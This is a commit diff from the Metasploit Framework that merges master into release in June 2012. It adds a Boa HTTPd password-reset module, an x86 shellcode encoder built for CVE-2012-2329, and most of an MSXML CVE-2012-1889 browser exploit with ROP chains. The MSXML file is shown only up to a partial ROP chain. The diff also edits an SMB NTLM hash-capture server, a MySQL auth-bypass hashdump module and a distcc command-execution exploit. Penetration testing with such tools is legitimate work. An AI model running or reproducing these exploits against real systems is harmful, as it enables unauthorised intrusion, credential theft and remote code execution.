Skip to content
Browse files

Merge branch 'master' into release

  • Loading branch information...
2 parents ee66cce + 4739aff commit d8f9bfb0d718e6e0b2e3a078e0739a98621fc07d @todb todb committed Jun 18, 2012
View
2 HACKING
@@ -31,7 +31,7 @@ interfaces other than msfconsole, such as msfrpc and msfgui, won't see
your output. You can use print_line to accomplish the same thing as
puts.
-2. Don't read from from standard input, doing so will make your code
+2. Don't read from standard input, doing so will make your code
lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactve session type specific for the type of exploit.
View
0 data/java/metasploit/AESEncryption.class 100644 → 100755
File mode changed.
View
2 lib/gemcache/ruby/1.9.1/bin/mdm_console
@@ -1,4 +1,4 @@
-#!/usr/local/rvm/rubies/ruby-1.9.3-p125/bin/ruby
+#!/usr/bin/env ruby_noexec_wrapper
#
# This file was generated by RubyGems.
#
View
2 ...asploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/report.rb
@@ -5,7 +5,7 @@ def self.included(base)
belongs_to :workspace, :class_name => "Mdm::Workspace"
serialize :options, ::MetasploitDataModels::Base64Serializer.new
- validates_format_of :name, :with => /^[A-Za-z0-9\x20\x2e\x2d\x5c]+$/, :message => "name must be A-Z, 0-9, space, dot, underscore, or dash", :allow_blank => true
+ validates_format_of :name, :with => /^[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+$/, :message => "name must consist of A-Z, 0-9, space, dot, underscore, or dash", :allow_blank => true
serialize :options, MetasploitDataModels::Base64Serializer.new
View
2 lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
@@ -6,7 +6,7 @@ Gem::Specification.new do |s|
s.required_rubygems_version = Gem::Requirement.new("> 1.3.1") if s.respond_to? :required_rubygems_version=
s.authors = ["Trevor Rosen"]
- s.date = "2012-06-13"
+ s.date = "2012-06-18"
s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions."
s.email = ["trevor_rosen@rapid7.com"]
s.executables = ["mdm_console"]
View
4 lib/msf/core/encoder.rb
@@ -106,6 +106,10 @@ module Type
#
NonUpperUtf8Safe = "non_upper_utf8_safe"
#
+ # tolower safe underscore safe for CVE-2012-2329 - PHP CGI apache_request_headers bof
+ #
+ NonUpperUnderscoreSafe = "non_upper_underscore"
+ #
# May result in the generation of any characters
#
Unspecified = "unspecified"
View
114 modules/auxiliary/admin/http/intersil_pass_reset.rb
@@ -0,0 +1,114 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
+ 'Description' => %q{
+ The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+ allows basic authentication bypass when the user string is greater
+ than 127 bytes long. The long string causes the password to be
+ overwritten in memory, which enables the attacker to reset the
+ password. In addition, the malicious attempt also may cause a
+ denial-of-service condition.
+
+ Please note that you must set the request URI to the directory that
+ requires basic authentication in order to work properly.
+ },
+ 'Author' =>
+ [
+ 'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+ 'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+ 'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
+ ],
+ 'DisclosureDate' => 'Sep 10 2007'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "The request URI", '/']),
+ OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
+ ], self.class)
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri'=>'/',
+ 'method'=>'GET'
+ })
+
+ if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+ print_status("#{@peer} - Boa Version Detected: #{m[1]}")
+ return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+ return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+ return Exploit::CheckCode::Vulnerable
+ else
+ print_status("#{@peer} - Not a Boa Server!")
+ return Exploit::CheckCode::Safe # not a boa server
+ end
+
+ rescue Rex::ConnectionRefused
+ print_error("#{@peer} - Connection refused by server.")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ @peer = "#{rhost}:#{rport}"
+ return if check != Exploit::CheckCode::Vulnerable
+
+ uri = target_uri.path
+ uri << '/' if uri[-1,1] != '/'
+
+ res = send_request_cgi({
+ 'uri'=> uri,
+ 'method'=>'GET',
+ 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}"
+ })
+
+ if res.nil?
+ print_error("#{@peer} - The server may be down")
+ return
+ elsif res and res.code != 401
+ print_status("#{@peer} - #{uri} does not have basic authentication enabled")
+ return
+ end
+
+ print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method'=> 'GET',
+ 'basic_auth' => "admin:#{datastore['PASSWORD']}"
+ })
+
+ if not res
+ print_error("#{@peer} - Server timedout, will not continue")
+ return
+ end
+
+ case res.code
+ when 200
+ print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
+ when 401
+ print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
+ else
+ print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
+ end
+
+ end
+end
View
12 modules/auxiliary/gather/enum_dns.rb
@@ -54,6 +54,7 @@ def initialize(info = {})
[
OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]),
OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]),
+ OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
], self.class)
end
@@ -453,10 +454,11 @@ def axfr(target, nssrv)
end
end
else
- print_error("Zone transfer failed")
+ print_error("Zone transfer failed (length was zero)")
end
- rescue
- print_error("Zone transfer failed")
+ rescue Exception => e
+ print_error("Error executing zone transfer: #{e.message}")
+ elog("Error executing zone transfer: #{e.message}\n#{e.backtrace.join("\n")}")
end
end
@@ -467,6 +469,10 @@ def axfr(target, nssrv)
def run
@res = Net::DNS::Resolver.new()
+ if datastore['TCP_DNS']
+ vprint_status("Using DNS/TCP")
+ @res.use_tcp = true
+ end
@res.retry = datastore['RETRY'].to_i
@res.retry_interval = datastore['RETRY_INTERVAL'].to_i
@threadnum = datastore['THREADS'].to_i
View
2 modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
@@ -130,7 +130,7 @@ def run_host(ip)
:socket => s,
:db => nil
})
- print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts"
+ print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
results << x
rescue RbMysql::AccessDeniedError
rescue Exception => e
View
2 modules/auxiliary/scanner/telnet/telnet_version.rb
@@ -42,7 +42,7 @@ def run_host(ip)
::Timeout.timeout(to) do
res = connect
# This makes db_services look a lot nicer.
- banner_santized = Rex::Text.to_hex_ascii(banner.to_s.unpack('C*').pack('U*'))
+ banner_santized = Rex::Text.to_hex_ascii(banner.to_s)
print_status("#{ip}:#{rport} TELNET #{banner_santized}")
report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_santized)
end
View
32 modules/auxiliary/server/capture/smb.rb
@@ -122,17 +122,17 @@ def smb_cmd_dispatch(cmd, c, buff)
elsif wordcount == 0x0C
smb_cmd_session_setup(c, buff, true)
else
- print_status("Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
+ print_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
end
when CONST::SMB_COM_TREE_CONNECT
- print_status("Denying tree connect from #{smb[:name]}")
+ print_status("SMB Capture - Denying tree connect from #{smb[:name]} - #{smb[:ip]}")
smb_error(cmd, c, SMB_SMB_STATUS_ACCESS_DENIED, @s_smb_esn)
else
- print_status("Ignoring request from #{smb[:name]} (#{cmd})")
+ print_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})")
smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
end
end
@@ -226,7 +226,7 @@ def smb_cmd_session_setup(c, buff, esn)
if start
blob.slice!(0,start)
else
- print_status("Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]}, ignoring ...")
+ print_status("SMB Capture - Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
@@ -318,11 +318,11 @@ def smb_cmd_session_setup(c, buff, esn)
:nt_cli_challenge => ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0]
}
elsif nt_len == 0
- print_status("Empty hash from #{smb[:name]} captured, ignoring ... ")
+ print_status("SMB Capture - Empty hash from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
else
- print_status("Unknown hash type from #{smb[:name]}, ignoring ...")
+ print_status("SMB Capture - Unknown hash type from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
@@ -339,7 +339,7 @@ def smb_cmd_session_setup(c, buff, esn)
begin
smb_get_hash(smb,arg,true)
rescue ::Exception => e
- print_status("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
+ print_status("SMB Capture - Error processing Hash from #{smb[:name]} - #{smb[:ip]} : #{e.class} #{e} #{e.backtrace}")
end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
@@ -379,11 +379,11 @@ def smb_cmd_session_setup(c, buff, esn)
:nt_cli_challenge => pkt['Payload'].v['Payload'][lm_len + 16, nt_len - 16].unpack("H*")[0]
}
elsif nt_len == 0
- print_status("Empty hash captured from #{smb[:name]} captured, ignoring ... ")
+ print_status("SMB Capture - Empty hash captured from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
else
- print_status("Unknown hash type capture from #{smb[:name]}, ignoring ...")
+ print_status("SMB Capture - Unknown hash type capture from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
@@ -401,7 +401,7 @@ def smb_cmd_session_setup(c, buff, esn)
smb_get_hash(smb,arg,false)
rescue ::Exception => e
- print_status("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
+ print_status("SMB Capture - Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
@@ -441,7 +441,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
when NTLM_CONST::NTLM_V1_RESPONSE
if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :type => 'ntlm' })
- print_status("NLMv1 Hash correspond to an empty password, ignoring ... ")
+ print_status("SMB Capture - NLMv1 Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
return
end
if (lm_hash == nt_hash or lm_hash == "" or lm_hash =~ /^0*$/ ) then
@@ -459,7 +459,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
:user => Rex::Text::to_ascii(smb[:username]),
:domain => Rex::Text::to_ascii(smb[:domain]),
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'ntlm' })
- print_status("NTLMv2 Hash correspond to an empty password, ignoring ... ")
+ print_status("SMB Capture - NTLMv2 Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
return
end
if lm_hash == '0' * 32 and lm_cli_challenge == '0' * 16
@@ -481,7 +481,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
:cli_challenge => [lm_hash].pack("H*")[0,8],
:ntlm_ver => NTLM_CONST::NTLM_2_SESSION_RESPONSE, :type => 'ntlm' })
- print_status("NTLM2_session Hash correspond to an empty password, ignoring ... ")
+ print_status("SMB Capture - NTLM2_session Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
return
end
lm_hash_message = lm_hash
@@ -500,13 +500,13 @@ def smb_get_hash(smb, arg = {}, esn=true)
when NTLM_CONST::NTLM_V1_RESPONSE
smb_db_type_hash = "smb_netv1_hash"
capturelogmessage =
- "#{capturedtime}\nNTLMv1 Response Captured from #{smb[:name]} \n" +
+ "SMB Captured - #{capturedtime}\nNTLMv1 Response Captured from #{smb[:name]} - #{smb[:ip]} \n" +
"USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}\n" +
"LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} \nNTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n"
when NTLM_CONST::NTLM_V2_RESPONSE
smb_db_type_hash = "smb_netv2_hash"
capturelogmessage =
- "#{capturedtime}\nNTLMv2 Response Captured from #{smb[:name]} \n" +
+ "SMB Captured - #{capturedtime}\nNTLMv2 Response Captured from #{smb[:name]} - #{smb[:ip]} \n" +
"USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}\n" +
"LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} " +
"LM_CLIENT_CHALLENGE:#{lm_chall_message ? lm_chall_message : "<NULL>"}\n" +
@@ -517,7 +517,7 @@ def smb_get_hash(smb, arg = {}, esn=true)
#also 'real' netv1 is almost never seen nowadays except with smbmount or msf server capture
smb_db_type_hash = "smb_netv1_hash"
capturelogmessage =
- "#{capturedtime}\nNTLM2_SESSION Response Captured from #{smb[:name]} \n" +
+ "SMB Captured - #{capturedtime}\nNTLM2_SESSION Response Captured from #{smb[:name]} - #{smb[:ip]} \n" +
"USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}\n" +
"NTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n" +
"NT_CLIENT_CHALLENGE:#{lm_hash_message ? lm_hash_message[0,16] : "<NULL>"} \n"
View
209 modules/encoders/x86/avoid_underscore_tolower.rb
@@ -0,0 +1,209 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Encoder
+
+ # This encoder has a manual ranking because it should only be used in cases
+ # where information has been explicitly supplied, like the BufferOffset.
+ Rank = ManualRanking
+
+ # This encoder is a modified version of the sakpe's Avoid UTF8/tolower one, having
+ # into account the next set of bad chars for CVE-2012-2329 exploitation:
+ # "\x00\x0d\x0a"
+ # "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
+ # "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5f"
+ # "\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e"
+ # "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
+ def initialize
+ super(
+ 'Name' => 'Avoid underscore/tolower',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a
+ modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check
+ the documentation of the skape encoder before using it. As the original,
+ this encoder expects ECX pointing to the start of the encoded payload. Also
+ BufferOffset must be provided if needed.
+
+ The changes introduced are (1) avoid the use of the 0x5f byte (underscore) in
+ because it is a badchar in the CVE-2012-2329 case and (2) optimize the
+ transformation block, having into account more relaxed conditions about bad
+ characters greater than 0x80.
+ },
+ 'Author' =>
+ [
+ 'skape', # avoid_utf8_lower Author
+ 'juan vazquez' # Adapted to be usable on CVE-2012-2329
+ ],
+ 'Arch' => ARCH_X86,
+ 'License' => MSF_LICENSE,
+ 'EncoderType' => Msf::Encoder::Type::NonUpperUnderscoreSafe,
+ 'Decoder' =>
+ {
+ 'KeySize' => 4,
+ 'BlockSize' => 4,
+ })
+ end
+
+ #
+ # Returns the decoder stub that is adjusted for the size of
+ # the buffer being encoded
+ #
+ def decoder_stub(state)
+ len = ((state.buf.length + 3) & (~0x3)) / 4
+
+ # Grab the number of additional bytes that we need to adjust by in order
+ # to get the context register to point immediately after the stub header
+ off = (datastore['BufferOffset'] || 0).to_i
+
+ # Check to make sure that the length is a valid size
+ while is_badchar(state, len)
+ # Prepend "\x90" nops to avoid break anything. Anyway it's going to be encoded.
+ state.buf = "\x90\x90\x90\x90" + state.buf
+ len = ((state.buf.length + 3) & (~0x3)) / 4
+ end
+
+ decoder =
+ "\x6a" + [len].pack('C') + # push len
+ "\x6b\x3c\x24\x09" + # imul 0x9
+ "\x60" + # pusha
+ "\x03\x0c\x24" + # add ecx, [esp]
+ "\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
+ "\x03\x0c\x24" + # add ecx, [esp]
+ "\x6a\x04" # push byte 0x4
+
+ # encoded sled
+ state.context = ''
+
+ return decoder
+ end
+
+ def encode_block(state, block)
+ buf = try_add(state, block)
+
+ if (buf.nil?)
+ buf = try_sub(state, block)
+ end
+
+ if (buf.nil?)
+ raise BadcharError.new(state.encoded, 0, 0, 0)
+ end
+
+ buf
+ end
+
+ #
+ # Appends the encoded context portion.
+ #
+ def encode_end(state)
+ state.encoded += state.context
+ end
+
+ #
+ # Generate the instructions that will be used to produce a valid
+ # block after decoding using the sub instruction in conjunction with
+ # two underscore/tolower safe values.
+ #
+ def try_sub(state, block)
+ buf = "\x81\x29";
+ vbuf = ''
+ ctx = ''
+ carry = 0
+
+ block.each_byte { |b|
+
+ x = 0
+ y = 0
+ attempts = 0
+ prev_carry = carry
+
+ begin
+ carry = prev_carry
+
+ if (b > 0x80)
+ diff = 0x100 - b
+ y = rand(0x80 - diff - 1).to_i + 1
+ x = (0x100 - (b - y + carry))
+ carry = 1
+ else
+ diff = 0x7f - b
+ x = rand(diff - 1) + 1
+ y = (b + x + carry) & 0xff
+ carry = 0
+ end
+
+ attempts += 1
+
+ # Lame.
+ return nil if (attempts > 512)
+
+ end while (is_badchar(state, x) or is_badchar(state, y))
+
+ vbuf += [x].pack('C')
+ ctx += [y].pack('C')
+ }
+
+ buf += vbuf + "\x03\x0c\x24"
+
+ state.context += ctx
+
+ return buf
+
+ end
+
+ #
+ # Generate instructions that will be used to produce a valid block after
+ # decoding using the add instruction in conjunction with two underscore/tolower
+ # safe values.
+ #
+ def try_add(state, block)
+ buf = "\x81\x01"
+ vbuf = ''
+ ctx = ''
+
+ block.each_byte { |b|
+
+ attempts = 0
+
+ begin
+ if b == 0x00
+ xv = rand(b - 1) # badchars will kill 0x00 if it isn't allowed
+ else
+ xv = rand(b - 1) + 1
+ end
+
+
+ attempts += 1
+
+ # Lame.
+ return nil if (attempts > 512)
+
+ end while (is_badchar(state, xv) or is_badchar(state, b - xv))
+
+ vbuf += [xv].pack('C')
+ ctx += [b - xv].pack('C')
+ }
+
+ buf += vbuf + "\x03\x0c\x24"
+
+ state.context += ctx
+
+ return buf
+ end
+
+ def is_badchar(state, val)
+ (val >= 0x41 and val <= 0x5a) or val == 0x5f or Rex::Text.badchar_index([val].pack('C'), state.badchars)
+ end
+
+end
View
6 modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Auxiliary::Report
def initialize(info = {})
- super(update_info(info,
+ super(update_info(info, {
'Name' => 'F5 BIG-IP SSH Private Key Exposure',
'Version' => '$Revision$',
'Description' => %q{
@@ -44,8 +44,8 @@ def initialize(info = {})
],
'DisclosureDate' => "Jun 11 2012",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
- 'DefaultTarget' => 0,
- ))
+ 'DefaultTarget' => 0
+ }))
register_options(
[
View
47 modules/exploits/unix/misc/distcc_exec.rb
@@ -63,6 +63,21 @@ def initialize(info = {})
], self.class)
end
+ def check
+ r = rand_text_alphanumeric(10)
+ connect
+ sock.put(dist_cmd("sh", "-c", "echo #{r}"))
+
+ dtag = rand_text_alphanumeric(10)
+ sock.put("DOTI0000000A#{dtag}\n")
+
+ err, out = read_output
+ if out.index(r)
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
def exploit
connect
@@ -72,6 +87,21 @@ def exploit
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
+ err, out = read_output
+
+ (err || "").split("\n") do |line|
+ print_status("stderr: #{line}")
+ end
+ (out || "").split("\n") do |line|
+ print_status("stdout: #{line}")
+ end
+
+ handler
+ disconnect
+ end
+
+ def read_output
+
res = sock.get_once(24, 5)
if !(res and res.length == 24)
@@ -85,29 +115,22 @@ def exploit
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
- return if not len
+ return [nil, nil] if not len
if (len > 0)
- res = sock.get_once(len, 5)
- res.split("\n").each do |line|
- print_status("stderr: #{line}")
- end
+ err = sock.get_once(len, 5)
end
# Check STDOUT
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
- return if not len
+ return [err, nil] if not len
if (len > 0)
- res = sock.get_once(len, 5)
- res.split("\n").each do |line|
- print_status("stdout: #{line}")
- end
+ out = sock.get_once(len, 5)
end
+ return [err, out]
- handler
- disconnect
end
View
15 modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -18,8 +18,8 @@ def initialize(info={})
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer 8 when
handling objects with the same ID property. At the moment this module targets
- IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited
- in the wild.
+ IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging
+ as well as the heap spray method seen in the wild (Java msvcrt71.dll).
},
'License' => MSF_LICENSE,
'Author' =>
@@ -69,7 +69,7 @@ def initialize(info={})
}
],
[
- 'IE 8 on Windows 7 SP1 with JRE ROP',
+ 'IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP',
{
'Rop' => :jre,
'RopOffset' => '0x5f4',
@@ -93,10 +93,11 @@ def get_target(agent)
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
- #Windows XP SP3 + IE 8.0
+ # Windows XP SP3 + IE 8.0
return targets[1]
- elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
- #Windows 7 SP1 + IE 8.0
+ elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8\.0/
+ # Windows 7 SP1 + IE 8.0
+ # Vista SP2 + IE 8.0
return targets[3]
else
return nil
@@ -335,4 +336,4 @@ def on_request_uri(cli, request)
mshtml!DllGetClassObject+0xafd09:
6363fcc6 8b5070 mov edx,dword ptr [eax+70h]
ds:0023:1c1c1c7c=????????
-=end
+=end
View
363 modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -0,0 +1,363 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({
+ :ua_name => HttpClients::IE,
+ :ua_minver => "6.0",
+ :ua_maxver => "8.0",
+ :javascript => true,
+ :os_name => OperatingSystems::WINDOWS,
+ :classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
+ :method => "definition",
+ :rank => NormalRanking
+ })
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
+ 'Description' => %q{
+ This module exploits a memory corruption flaw in Microsoft XML Core Services
+ when trying to access an uninitialized Node with the getDefinition API, which
+ may corrupt memory allowing remote code execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'inking26', # Reliable exploitation
+ 'binjo', # Metasploit module
+ 'sinn3r', # Metasploit module
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-1889' ],
+ [ 'BID', '53934' ],
+ [ 'OSVDB', '82873'],
+ [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
+ [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
+ [ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ 'Space' => 1024
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "none",
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # msxml3.dll 8.90.1101.0
+ [ 'Automatic', {} ],
+ [
+ 'IE 6 on Windows XP SP3',
+ {
+ 'Offset' => '0x100',
+ 'Rop' => nil
+ }
+ ],
+ [
+ 'IE 7 on Windows XP SP3',
+ {
+ 'Offset' => '0x100',
+ 'Rop' => nil
+ }
+ ],
+ [
+ 'IE 8 on Windows XP SP3',
+ {
+ 'Rop' => :msvcrt,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
+ }
+ ],
+ [
+ 'IE 8 with Java 6 on Windows XP SP3',
+ {
+ 'Rop' => :jre,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+ }
+ ],
+ [
+ 'IE 8 with Java 6 on Windows 7 SP1',
+ {
+ 'Rop' => :jre,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jun 12 2012",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+ ], self.class)
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+ return targets[1] #IE 6 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+ return targets[2] #IE 7 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+ return targets[3] #IE 8 on Windows XP SP3
+ elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
+ return targets[5] #IE 8 on Windows 7 SP1
+ else
+ return nil
+ end
+ end
+
+ def junk(n=4)
+ return rand_text_alpha(n).unpack("V").first
+ end
+
+ def nop
+ return make_nops(4).unpack("V").first
+ end
+
+ def ret(t)
+ case t['Rop']
+ when :msvcrt
+ return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
+ when :jre
+ return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
+ end
+ end
+
+ def popret(t)
+ case t['Rop']
+ when :msvcrt
+ return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
+ when :jre
+ return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
+ end
+ end
+
+ def get_rop_chain(t)
+
+ adjust = ret(t)
+ adjust << popret(t)
+ adjust << [ t['StackPivot'] ].pack("V")
+ adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
+
+ # Both ROP chains generated by mona.py - See corelan.be
+ case t['Rop']
+ when :msvcrt
+ print_status("Using msvcrt ROP")
+ rop =
+ [
+ 0x77c4e392, # POP EAX # RETN
+ 0x77c11120, # <- *&VirtualProtect()
+ 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+ junk,
+ 0x77c2dd6c,
+ 0x77c4ec00, # POP EBP # RETN
+ 0x77c35459, # ptr to 'push esp # ret'
+ 0x77c47705, # POP EBX # RETN
+ 0x00001000, # EBX
+ 0x77c3ea01, # POP ECX # RETN
+ 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
+ 0x77c46100, # POP EDI # RETN
